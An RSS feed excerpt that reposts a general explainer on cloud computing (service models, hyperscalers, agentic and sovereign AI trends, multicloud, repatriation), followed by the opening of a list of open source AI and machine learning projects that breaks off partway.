<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h3 class="wp-block-heading"></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337750/when-will-cloud-computing-stop-growing.html">Cloud computing</a> continues to be the <a href="https://www.cio.com/article/482179/volkswagen-drives-the-automotive-industry-cloud-forward.html">platform of choice for large applications</a> and a <a href="https://www.infoworld.com/article/2336917/cloud-computing-is-reinventing-cars-and-trucks.html">driver of innovation</a> in enterprise technology. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-20-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-surpass-675-billion-in-2024#:~:text=Worldwide%20end-user%20spending%20on,(GenAI)%20and%20application%20modernization.">Gartner </a>forecasts public cloud spending alone to  the<a href="https://www.gartner.com/en/documents/6302015#:~:text=Summary,AI%20workloads%20and%20enterprise%20modernization."> public cloud services market alone </a>will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and enterprise modernization.</p>



<p class="wp-block-paragraph">Driving this growth are the rise of <a href="https://www.infoworld.com/article/2262333/youre-doing-cloud-based-ai-and-machine-learning-wrong.html">AI and machine learning on the cloud</a>, <a href="https://www.infoworld.com/article/2335144/what-happened-to-edge-computing.html">adoption of edge computing</a>, the maturation of <a href="https://www.infoworld.com/article/3406501/what-is-serverless-serverless-computing-explained.html">serverless computing</a>, the emergence of <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud strategies</a>, improved security and privacy, and more sustainable cloud practices.</p>



<h2 class="wp-block-heading">What is cloud computing?</h2>



<p class="wp-block-paragraph">While often used broadly, the term cloud computing is defined as an abstraction of compute, storage, and network infrastructure assembled as a platform on which applications and systems are deployed quickly and scaled on the fly.</p>



<p class="wp-block-paragraph">Most cloud customers consume <a href="https://www.cio.com/article/2097657/6-cloud-market-forces-impacting-it-strategies-today.html">public cloud </a>computing services over the internet, which are hosted in large, remote data centers maintained by cloud providers. The most common type of cloud computing, SaaS (software as service), delivers prebuilt applications to the browsers of customers who pay per seat or by usage, exemplified by such popular apps as Salesforce, Google Docs, or Microsoft Teams.</p>



<h3><strong> 5 top trends in cloud computing</strong></h3>

<ol>
<li><strong>Agentic cloud ecosystems: </strong> The shift from AI as a tool to AI as an autonomous operator within cloud environments.</li>
<li><strong>Sovereign and localized clouds: </strong> Meeting strict national data residency and digital sovereignty laws.</li>
<li><strong>Specialized AI hardware access: </strong> Navigating the GPU capacity crunch through reserved instances and boutique AI clouds.</li>
<li><strong>Integrated greenOps: </strong>Merging cost optimization with mandatory carbon-footprint reporting.</li>
<li><strong>Industry-specific walled gardens: </strong> The maturation of vertical clouds into highly regulated, precompliant environments for finance and healthcare.</li>
</ol>






<p class="wp-block-paragraph">Next in line is IaaS (infrastructure as a service), which offers vast, virtualized compute, storage, and network infrastructure upon which customers build their own applications, often with the aid of providers’ <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">API</a>-accessible services.</p>



<p class="wp-block-paragraph">When people refer to the “the cloud” today, they most often mean the big IaaS providers: AWS (Amazon Web Services), Google Cloud Platform, or Microsoft Azure. All three have become ecosystems of services that go way beyond infrastructure and include developer tools, serverless computing, machine learning services and APIs, data warehouses, and thousands of other services. With both SaaS and IaaS, a key benefit is agility. Customers gain new capabilities almost instantly without the capital investment in hardware or software on-premises — and they can instantly scale the cloud resources they consume up or down as needed.</p>



<p class="wp-block-paragraph">According to <a href="https://foundryco.com/research/cloud-computing/">Foundry’s Cloud Computing Study, 2025</a>, enterprises are moving to the cloud to improve security and/or governance, increase scalability​, accelerate adoption of artificial intelligence and machine learning and other new technologies, replace on-premises legacy technology, ​improve employee productivity, and ensure disaster recovery and business continuity.</p>



<h2 class="wp-block-heading">Hyperscalers now dominate cloud services</h2>



<p class="wp-block-paragraph">The largest cloud service providers are often described as hyperscalers, due to their capability to provide large-scale data centers across the globe. Hyperscalers typically offer a wide range of cloud services, including IaaS, PaaS, SaaS, and more.</p>



<p class="wp-block-paragraph">As mentioned above, notable hyperscalers include Amazon Web Services (AWS), Google Cloud Platform, and Microsoft Azure. They offer the following capabilities.</p>



<ul class="wp-block-list">
<li><strong>Scalability</strong>: Hyperscalers can handle massive workloads and scale resources up or down quickly.</li>



<li><strong>Cost-effectiveness</strong>: Hyperscalers often offer competitive pricing and economies of scale.</li>



<li><strong>Global reach</strong>: Hyperscalers operate data centers around the world, providing low-latency access to customers in different regions.</li>



<li><strong>Innovation</strong>: Hyperscalers are at the forefront of cloud innovation, offering new services and features.</li>
</ul>



<h3 class="wp-block-heading">Challenges of working with hyperscalers</h3>



<ul class="wp-block-list">
<li><strong>Vendor lock-in</strong>: Relying heavily on a single hyperscaler can create <a href="https://www.cio.com/article/648048/hyperscalers-in-crosshairs-for-anti-competitive-pricing-and-lock-in.html">vendor lock-in</a>, making it difficult to switch to another provider and charging large egress fees if you do move.</li>



<li><strong>Complexity</strong>: Hyperscalers offer a vast array of services, which can be overwhelming for some customers.</li>



<li><strong>Security concerns</strong>: Because hyperscalers handle sensitive data, security is a major concern.</li>
</ul>



<h2 class="wp-block-heading"><strong>AI, Agents, and the Sovereign Cloud</strong></h2>



<p class="wp-block-paragraph">The AI-enabled enterprise has moved beyond simple chatbots. The focus has shifted to <strong>agentic workflows </strong>— autonomous systems that reside in the cloud and possess the authority to execute business processes, manage cloud spend, and self-patch security vulnerabilities without human intervention.</p>



<h3 class="wp-block-heading"><strong>The shift to agentic infrastructure</strong></h3>



<p class="wp-block-paragraph">Cloud providers are no longer just selling compute. They are selling <strong>inference-as-a-service</strong>. Modern cloud budgets are now dominated by the high cost of specialized GPU clusters (such as Nvidia’s Blackwell architecture). This has led to the rise of boutique AI clouds that compete with hyperscalers by offering bare-metal access to the latest silicon specifically for model training and fine-tuning.</p>



<h3 class="wp-block-heading"><strong>Data sovereignty and private AI</strong></h3>



<p class="wp-block-paragraph">A major shift in late 2025 is the move away from public AI models for sensitive data. Organizations are increasingly using retrieval-augmented generation (RAG) within walled garden environments. This ensures that a company’s proprietary data never leaves their specific cloud instance to train a provider’s base model.</p>



<p class="wp-block-paragraph">Furthermore, sovereign AI has become a requirement for global operations. Governments now demand that the AI models processing their citizens’ data be hosted on infrastructure that is owned, operated, and governed within their own borders.</p>



<h3 class="wp-block-heading"><strong>The challenges of ghost AI</strong></h3>



<p class="wp-block-paragraph">Just as shadow IT plagued the 2010s, ghost AI—unauthorized AI agents running on corporate cloud accounts — has become a primary security risk. Managing these autonomous entities requires a new layer of <strong>AI governance</strong>, where the cloud provider automatically audits the intent and permissions of every running agent to prevent runaway costs or data leaks.</p>



<h2 class="wp-block-heading">Cloud computing definitions</h2>



<p class="wp-block-paragraph">In 2011, <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-145.pdf">NIST posted a PDF</a> that divided cloud computing into three “service models” — SaaS, IaaS, and PaaS (platform as a service) — the latter being a controlled environment within which customers develop and run applications. These three categories have largely stood the test of time, although most PaaS solutions now are made available as services within IaaS ecosystems rather than as dedicated PaaS clouds.</p>



<p class="wp-block-paragraph">Two evolutionary trends stand out since NIST’s threefold definition. One is the long and growing list of subcategories within SaaS, IaaS, and PaaS, some of which blur the lines between categories. The other is the explosion of API-accessible services available in the cloud, particularly within IaaS ecosystems. The cloud has become a crucible of innovation where many emerging technologies appear first as services, a big attraction for business customers who understand the potential competitive advantages of early adoption.</p>



<h3 class="wp-block-heading"><strong>SaaS (software as a service) definition</strong></h3>



<p class="wp-block-paragraph">This type of cloud computing delivers applications over the internet, typically with a browser-based user interface. Today, most software companies offer their wares via <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS </a>— if not exclusively, then at least as an option.</p>



<p class="wp-block-paragraph">The most popular SaaS applications for business are <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google’s G Suite</a> and <a href="https://www.computerworld.com/article/1710782/office-2021-vs-microsoft-365-office-365-how-to-choose.html">Microsoft’s Office 365</a>. Most enterprise applications, including giant <a href="https://www.cio.com/article/272362/what-is-erp-key-features-of-top-enterprise-resource-planning-systems.html">ERP</a> suites from Oracle and SAP, come in both SaaS and on-premises versions. SaaS applications typically offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions. They also enable data integration with on-prem applications.</p>



<h3 class="wp-block-heading"><strong>IaaS (infrastructure as a service) definition</strong></h3>



<p class="wp-block-paragraph">At a basic level, <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">IaaS </a>cloud providers offer virtualized compute, storage, and networking over the internet on a pay-per-use basis. Think of it as a data center maintained by someone else, remotely, but with a software layer that virtualizes all those resources and automates customers’ ability to allocate them with little trouble.</p>



<p class="wp-block-paragraph">But that’s just the basics. The full array of services offered by the major public IaaS providers is staggering: <a href="https://www.infoworld.com/article/2269279/the-era-of-the-cloud-database-has-finally-begun.html">highly scalable databases</a>, virtual private networks, <a href="https://www.infoworld.com/article/2255434/what-is-big-data-analytics-fast-answers-from-diverse-data-sets.html">big data analytics</a>, <a href="https://www.infoworld.com/article/2259367/buyers-guide-how-to-choose-a-cloud-machine-learning-platform.html">AI and machine learning services</a>, application platforms, developer tools, <a href="https://www.infoworld.com/article/3215275/what-is-devops-transforming-software-development.html">devops</a> tools, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by <a href="https://www.infoworld.com/article/2269424/azure-cloud-services-guide-the-right-tools-for-the-job.html">Microsoft Azure</a>, <a href="https://www.infoworld.com/article/2263677/google-cloud-platform-services-guide-the-right-tools-for-the-job.html">Google Cloud Platform</a>, <a href="https://www.infoworld.com/article/2256709/ibm-cloud-services-guide-the-right-tools-for-the-job.html">IBM Cloud</a>, and <a href="https://www.infoworld.com/article/3529339/oracle-cloudworld-2024-10-key-takeaways-from-the-big-annual-event.html">Oracle Cloud</a>.</p>



<h3 class="wp-block-heading"><strong>PaaS (platform as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">PaaS</a> provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s <a href="https://www.infoworld.com/article/2257217/5-foolish-reasons-youre-not-using-heroku.html">Heroku</a> and Salesforce Platform (formerly Force.com) are popular public cloud PaaS offerings; <a href="https://www.infoworld.com/article/2258957/cloud-foundry-stages-a-comeback.html">Cloud Foundry</a> and Red Hat’s <a href="https://www.infoworld.com/article/2261552/red-hat-openshift-adds-containers-and-microservices-features-for-developers.html">OpenShift</a> can be deployed on premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.</p>



<h3 class="wp-block-heading"><strong>FaaS (function as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256402/paas-caas-or-faas-how-to-choose.html">FaaS</a>, the original and most basic version of <a href="https://www.infoworld.com/article/2266283/serverless-in-the-cloud-aws-vs-google-cloud-vs-microsoft-azure.html">serverless computing</a>, adds another layer of abstraction to PaaS, so that developers are insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, developers upload narrowly functional blocks of code, and set them to be triggered by a certain event (such as a form submission or uploaded file). All of the major clouds offer FaaS on top of IaaS: <a href="https://www.infoworld.com/article/2265897/aws-lambda-tutorial-get-started-with-serverless-computing-2.html">AWS Lambda</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Azure Functions</a>, <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google Cloud Functions</a>, and IBM Cloud Functions. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.</p>



<h3 class="wp-block-heading"><strong>Private cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2179737/build-your-own-private-cloud-2.html">private cloud</a> downsizes the technologies used to run IaaS public clouds into software that can be deployed and operated in a customer’s data center. As with a public cloud, internal customers can provision their own virtual resources to build, test, and run applications, with metering to charge back departments for resource consumption. For administrators, the private cloud amounts to the ultimate in data center automation, minimizing manual provisioning and management.</p>



<p class="wp-block-paragraph">VMware remains a force in the private cloud software market, but the acquisition by Broadcom has created confusion and raised concerns among some customers about potential changes in pricing, licensing, and support. This could lead some organizations to explore alternative solutions.</p>



<p class="wp-block-paragraph">OpenStack continues to be a popular open-source choice for building private clouds. It offers a flexible and customizable platform that can be tailored to specific needs. However, OpenStack can be complex to deploy and manage, and it may require significant expertise to maintain.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/3268073/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, a container orchestration platform that has gained significant traction in recent years, is often used in conjunction with other technologies like OpenStack to build <a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> applications. Red Hat OpenShift is a comprehensive cloud platform based on Kubernetes that provides a managed experience for deploying and managing <a href="https://www.infoworld.com/article/3310941/why-you-should-use-docker-and-containers.html">container</a>-based, applications.</p>



<p class="wp-block-paragraph">Many cloud providers offer their own cloud-native platforms and tools, such as <a href="https://www.networkworld.com/article/968169/aws-rolls-out-outposts-for-on-premises-hybrid-cloud.html">AWS Outposts</a>, <a href="https://www.infoworld.com/article/2253985/a-cloud-in-your-datacenter-microsoft-azure-stack-arrives.html">Azure Stack</a>, and <a href="https://www.infoworld.com/article/2257617/what-is-google-cloud-anthos-managed-kubernetes-everywhere.html">Google Cloud Anthos</a>.</p>



<p class="wp-block-paragraph">Common factors to consider when evaluating private cloud platforms include the following:</p>



<ol class="wp-block-list">
<li><strong>Pricing</strong>: The initial cost of deployment and ongoing maintenance costs.</li>



<li><strong>Complexity</strong>: The level of technical expertise needed to manage the platform.</li>



<li><strong>Flexibility</strong>: The ability to customize the platform to meet specific needs.</li>



<li><strong>Vendor lock-in</strong>: The degree to which the organization is tied to a particular vendor.</li>



<li><strong>Security</strong>: The security features and capabilities of the platform.</li>



<li><strong>Scalability</strong>: The capability to expand the platform to meet future needs.</li>
</ol>



<h3 class="wp-block-heading"><strong>Hybrid cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2257084/hybrid-cloud-private-cloud-public-cloud-multicloud-how-to-choose.html">hybrid cloud</a> is the integration of a private cloud with a public cloud. At its most developed, the hybrid cloud involves creating parallel environments in which applications can move easily between private and public clouds. In other instances, databases may stay in the customer data center and integrate with public cloud applications — or virtualized data center workloads may be replicated to the cloud during times of peak demand. The types of integrations between private and public clouds vary widely, but they must be extensive to earn a hybrid cloud designation.</p>



<h3 class="wp-block-heading"><strong>Public APIs (application programming interfaces) definition</strong></h3>



<p class="wp-block-paragraph">Just as SaaS delivers applications to users over the internet, public <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a> offer developers application functionality that can be accessed programmatically. For example, in building web applications, developers often tap into the Google Maps API to provide driving directions; to integrate with social media, developers may call upon APIs maintained by Twitter, Facebook, or LinkedIn. <a href="https://www.infoworld.com/article/2253662/get-started-with-twilios-programmable-video-api.html">Twilio</a> has built a successful business delivering telephony and messaging services via public APIs. Ultimately, any business can provision its own public APIs to enable customers to consume data or access application functionality.</p>



<h3 class="wp-block-heading"><strong>iPaaS (integration platform as a service) definition</strong></h3>



<p class="wp-block-paragraph">Data integration is a key issue for any sizeable company, but particularly for those that adopt SaaS at scale. iPaaS providers typically offer prebuilt connectors for sharing data among popular SaaS applications and on-premises enterprise applications, though providers may focus more or less on business-to-business and e-commerce integrations, cloud integrations, or traditional SOA-style integrations. iPaaS offerings in the cloud from such providers as Dell Boomi, Informatica, MuleSoft, and SnapLogic also let users implement data mapping, transformations, and workflows as part of the integration-building process.</p>



<h3 class="wp-block-heading"><strong>IDaaS (identity as a service) definition</strong></h3>



<p class="wp-block-paragraph">The most difficult security issue related to <a href="https://www.infoworld.com/article/2268884/why-cloud-computing-is-always-a-good-question.html">cloud computing</a> is managing user identity and its associated rights and permissions across data centers and pubic cloud sites. <a href="https://www.csoonline.com/article/572759/idaas-explained-how-it-compares-to-iam.html">IDaaS providers</a> maintain cloud-based user profiles that authenticate users and enable access to resources or applications based on security policies, user groups, and individual privileges. The ability to integrate with various directory services (Active Directory, LDAP, etc.) and provide single sign-on across business-oriented SaaS applications is essential.</p>



<p class="wp-block-paragraph">Leaders in IDaaS include Microsoft, IBM, Google, Oracle, Okta, Capgemini, Okta, Junio Corporation, OneLogin, and JumpCloud. <strong> </strong></p>



<h3 class="wp-block-heading"><strong>Collaboration platforms</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/3595255/slack-adds-templates-to-help-users-kick-off-projects-quicker.html">Collaboration solutions such as Slack</a> and <a href="https://www.computerworld.com/article/3593909/microsoft-combines-teams-chat-and-channels-in-ui-refresh.html">Microsoft Teams</a> have become vital messaging platforms that enable groups to communicate and work together effectively. Basically, these solutions are relatively simple SaaS applications that support chat-style messaging along with file sharing and audio or video communication. Most offer APIs to facilitate integrations with other systems and enable third-party developers to create and share add-ins that augment functionality.</p>



<h3 class="wp-block-heading"><strong>Vertical clouds</strong></h3>



<p class="wp-block-paragraph">Key providers in such industries as financial services, healthcare, retail, life sciences, and manufacturing provide PaaS clouds to enable customers to build vertical applications that tap into industry-specific, API-accessible services. Vertical clouds can dramatically reduce the time to market for vertical applications and accelerate domain-specific B2B integrations. Most vertical clouds are built with the intent of nurturing partner ecosystems.</p>



<h2 class="wp-block-heading"><strong>Other cloud computing considerations</strong></h2>



<p class="wp-block-paragraph">The most widely accepted definition of cloud computing means that you run your workloads on someone else’s servers, but this is not the same as outsourcing. Virtual cloud resources and even SaaS applications must be configured and maintained by the customer. Consider these factors when planning a cloud initiative.</p>



<h3 class="wp-block-heading"><strong>Cloud computing security considerations</strong></h3>



<p class="wp-block-paragraph">Objections to the public cloud generally begin with <a href="https://www.csoonline.com/article/555213/top-cloud-security-threats.html">cloud security</a>, although the major public clouds have proven themselves much less susceptible to attack than the average enterprise data center.</p>



<p class="wp-block-paragraph">Of greater concern is the integration of security policy and identity management between customers and public cloud providers. In addition, government regulation may forbid customers from allowing sensitive data off-premises. Other concerns include the risk of outages and the long-term operational costs of public cloud services.</p>



<h3 class="wp-block-heading"><strong>Multicloud management considerations</strong></h3>



<p class="wp-block-paragraph">To enhance their operational efficiency, reduce costs, and improve security, many companies are increasingly turning to <a href="https://www.infoworld.com/article/2335587/can-cloud-computing-be-truly-federated.html">multicloud strategies</a>. By distributing workloads across <a href="https://www.infoworld.com/article/2336303/are-the-different-public-clouds-really-that-different.html">multiple cloud providers</a>, organizations can avoid vendor lock-in, <a href="https://www.infoworld.com/article/2261783/3-cloud-architecture-patterns-that-optimize-scalability-and-cost.html">optimize costs</a>, and leverage the best-of-breed services offered by different providers.</p>



<p class="wp-block-paragraph">This multicloud approach also improves performance and reliability by minimizing downtime and optimizing latency. Additionally, multicloud strategies strengthen security by diversifying the attack surface and facilitating compliance with industry regulations. Finally, by replicating critical workloads across multiple regions and providers, companies can establish robust disaster recovery and business continuity plans, ensuring minimal disruption in the event of catastrophic failures.</p>



<p class="wp-block-paragraph">The bar to qualify as a <a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">multicloud</a> adopter is low: A customer just needs to use more than one public cloud service. However, depending on the number and variety of cloud services involved, managing multiple clouds can become complex from both a cost optimization and a technology perspective.</p>



<p class="wp-block-paragraph">In some cases, customers subscribe to multiple cloud services simply to avoid dependence on a single provider. A more sophisticated approach is to select public clouds based on the unique services they offer and, in some cases, integrate them. For example, developers might want to use Google’s <a href="https://www.infoworld.com/article/2336686/google-vertex-ai-studio-puts-the-promise-in-generative-ai.html">Vertex AI Studio</a> on Google Cloud Platform to build AI-driven applications, but prefer <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a> hosted on the CloudBees platform for <a href="https://www.infoworld.com/article/3271126/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration</a>.</p>



<p class="wp-block-paragraph">To control costs and reduce management overhead, some customers opt for <a href="https://www.infoworld.com/article/3520828/how-cloud-custodian-conquered-cloud-resource-management.html">cloud management platforms</a> (CMPs) and/or cloud service brokers (CSBs), which let you manage multiple clouds as if they were one cloud. The problem is that these solutions tend to limit customers to such common-denominator services as storage and compute, ignoring the panoply of services that make each cloud unique.</p>



<h3 class="wp-block-heading"><strong>Edge computing considerations</strong></h3>



<p class="wp-block-paragraph">You often see <a href="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html">edge computing</a> incorrectly described as an alternative to cloud computing. Edge computing is about moving compute to local devices in a highly distributed system, typically as a layer around a cloud computing core. There is typically a cloud involved to orchestrate all of the devices and take in their data, then analyze it or otherwise act on it. </p>



<h3 class="wp-block-heading"><strong>To the cloud and back – why repatriation is real</strong></h3>



<p class="wp-block-paragraph">While public cloud offers scalability and flexibility, some enterprises are opting to <a href="https://www.infoworld.com/article/2336102/why-companies-are-leaving-the-cloud.html">return to on-premises infrastructure</a> due to rising costs, data security concerns, performance issues, vendor lock-in, and regulatory compliance challenges. While the public cloud offers scalability and flexibility, on-premises infrastructure provides greater control, customization, and potential cost savings in certain scenarios leading some technology decision-makers to <a href="https://www.infoworld.com/article/2336835/do-you-need-to-repatriate-from-the-cloud.html">consider repatriation</a>. However, a hybrid cloud approach, combining public and private cloud, often offers the best balance of benefits.</p>



<p class="wp-block-paragraph">More specific reasons to repatriate including the following:</p>



<ul class="wp-block-list">
<li>Unanticipated costs, such as data transfer fees, storage charges, and <a href="https://www.infoworld.com/article/2336430/why-public-cloud-providers-are-cutting-egress-fees.html">egress fees</a>, can quickly escalate, especially for large-scale cloud deployments.  </li>



<li>Inaccurate resource provisioning or underutilization can lead to higher-than-expected costs.</li>



<li>Stricter <a href="https://www.infoworld.com/article/3545268/why-cloud-security-outranks-cost-and-scalability.html">data privacy regulations</a> require organizations to store and process data within specific geographic boundaries.  </li>



<li>For highly sensitive data, companies may prefer to maintain greater control over security measures and access permissions. </li>



<li><a href="https://www.infoworld.com/article/2338856/cloud-may-be-overpriced-compared-to-on-premises-systems.html">On-premises infrastructure</a> can offer lower latency, particularly for applications requiring real-time processing or high-performance computing.  </li>



<li>Overreliance on a single cloud provider can limit flexibility and increase costs. Repatriation allows organizations to diversify their infrastructure and reduce vendor dependency.  </li>



<li>Industries with stringent compliance requirements may find it easier to meet standards with on-premises infrastructure.  </li>



<li>On-premises environments offer greater control over hardware, software, and network configurations, allowing for customized solutions.  </li>
</ul>



<h2 class="wp-block-heading"><strong>Benefits of cloud computing</strong></h2>



<p class="wp-block-paragraph">The cloud’s main appeal is to reduce the time to market of applications that need to scale dynamically. Increasingly, however, developers are drawn to the cloud by the abundance of advanced new services that can be incorporated into applications, from machine learning to internet of things (IoT) connectivity.</p>



<p class="wp-block-paragraph">Although businesses sometimes migrate legacy applications to the cloud to reduce data center resource requirements, the real benefits accrue to new applications that take advantage of cloud services and “cloud native” attributes. The latter include <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices architecture</a>, <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Linux containers</a> to enhance application portability, and container management solutions such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> that orchestrate container-based services. <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">Cloud-native</a> approaches and solutions can be part of either public or private clouds and help enable highly efficient <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> workflows.</p>



<p class="wp-block-paragraph">Cloud computing, be it public or private or hybrid or multicloud, has become the platform of choice for large applications, particularly customer-facing ones that need to change frequently or scale dynamically. More significantly, the major public clouds now lead the way in enterprise technology development, debuting new advances before they appear anywhere else. Workload by workload, enterprises are opting for the cloud, where an endless parade of exciting new technologies invite innovative use.</p>



<p class="wp-block-paragraph">SaaS has its roots in the ASP (application service provider) trend of the early 2000s, when providers would run applications for business customers in the provider’s data center, with dedicated instances for each customer. The ASP model was a spectacular failure because it quickly became impossible for providers to maintain so many separate instances, particularly as customers demanded customizations and updates.</p>



<p class="wp-block-paragraph">Salesforce is widely considered the first company to launch a highly successful SaaS application using <a href="https://www.infoworld.com/article/2335534/the-evolution-of-multitenancy-for-cloud-computing.html">multitenancy</a> — a defining characteristic of the SaaS model. Rather than each Salesforce customer getting its own application instance, customers who subscribe to the company’s salesforce automation software share a single, large, dynamically scaled instance of an application (like tenants sharing an apartment building), while storing their data in separate, secure repositories on the SaaS provider’s servers. Fixes can be rolled out behind the scenes with zero downtime and customers can receive UX or functionality improvements as they become available.</p>



<p class="wp-block-paragraph"></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[16 open source projects transforming AI and machine learning]]></title>
<description><![CDATA[For several decades now, the most innovative software has always emerged from the world of open source software. It’s no different with machine learning and large language models. If anything, the open source ecosystem has grown richer and more complex, because now there are open source models to...]]></description>
<link>https://tsecurity.de/de/3665665/ai-nachrichten/16-open-source-projects-transforming-ai-and-machine-learning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665665/ai-nachrichten/16-open-source-projects-transforming-ai-and-machine-learning/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For several decades now, the most innovative software has always emerged from the world of open source software. It’s no different with machine learning and <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large language models</a>. If anything, the open source ecosystem has grown richer and more complex, because now there are open source models to complement the open source code.</p>



<p class="wp-block-paragraph">For this article, we’ve pulled together some of the most intriguing and useful projects for <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">AI and machine learning</a>. Many of these are foundation projects, nurturing their own niche ecology of open source plugins and extensions. Once you’ve started with the basic project, you can keep adding more parts.</p>



<p class="wp-block-paragraph">Most of these projects offer demonstration code, so you can start up a running version that already tackles a basic task. Additionally, the companies that build and maintain these projects often sell a service alongside them. In some cases, they’ll deploy the code for you and save you the hassle of keeping it running. In others, they’ll sell custom add-ons and modifications. The code itself is still open, so there’s no vendor lock in. The services simply make it easier to adopt the code by paying someone to help.</p>



<p class="wp-block-paragraph">Here are 16 open source projects that developers can use to unlock the potential in machine learning and large language models of any size—from small to large, and even extra large.</p>



<h2 class="wp-block-heading">Agent Skills</h2>



<p class="wp-block-paragraph">AI coding agents are often used to tackle standard tasks like <a href="https://www.infoworld.com/article/3981588/putting-agentic-ai-to-work-in-firebase-studio.html">writing React components</a> or <a href="https://www.infoworld.com/article/4025088/how-coderabbit-brings-ai-to-code-reviews.html">reviewing parts of the user interface</a>. If you are writing a coding agent, it makes sense to use vetted solutions that are focused on the task at hand. <a href="https://github.com/vercel-labs/agent-skills">Agent Skills</a> are pre-coded tools that your AI can deploy as needed. The result is a focused set of vetted operations capable of producing refined, useful code that stays within standard guidelines. License: MIT.</p>



<h2 class="wp-block-heading">Awesome LLM Apps</h2>



<p class="wp-block-paragraph">If you are looking for good examples of agentic coding, see the <a href="https://github.com/Shubhamsaboo/awesome-llm-apps">Awesome LLM Apps collection</a>. Currently, the project hosts several dozen applications that leverage some combination of <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">RAG databases</a> and LLMs. Some are simple, like a meme generator, while others handle deeper research like the Journalist agent. The most complex examples deploy multi-agent teams to converge upon an answer. Every application comes with working examples for experimentation, so you can learn from what’s been successful in the past. Altogether, the apps in this collection are great inspiration for your own projects. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Bifrost</h2>



<p class="wp-block-paragraph">If your application requires access to an LLM service, and you don’t have a particular one in mind, check out <a href="https://github.com/maximhq/bifrost">Bifrost</a>. A fast, unified gateway to more than 15 LLM providers, this OpenAI-compatible API quickly abstracts away the differences between models, including all the major ones. It includes essential features like governance, caching, budget management, load balancing, and it has guardrails to catch problems before they are sent out to service providers, who will just bill you for the time. With dozens of great LLM providers constantly announcing new and better models, why limit yourself? License: Apache 2.0.</p>



<h2 class="wp-block-heading">Claude Code</h2>



<p class="wp-block-paragraph">If the popularity of AI coding assistants tells us anything, it’s that all developers—and not just the ones building AI apps—appreciate a little help writing and reviewing their code. <a href="https://github.com/anthropics/claude-code">Claude Code</a> is that pair programmer. Trained on all the major programming languages, <a href="https://www.infoworld.com/article/3853805/vibe-coding-with-claude-code.html">Claude Code can help you write code that is better, faster, and cleaner</a>. It digests a codebase and then starts doing your bidding, while also making useful suggestions. Natural language commands plus some vague hand waving are all the Anthropic LLM needs to refactor, document, or even add new features to your existing code. License: Anthropic’s Commercial TOS.</p>



<h2 class="wp-block-heading">Clawdbot</h2>



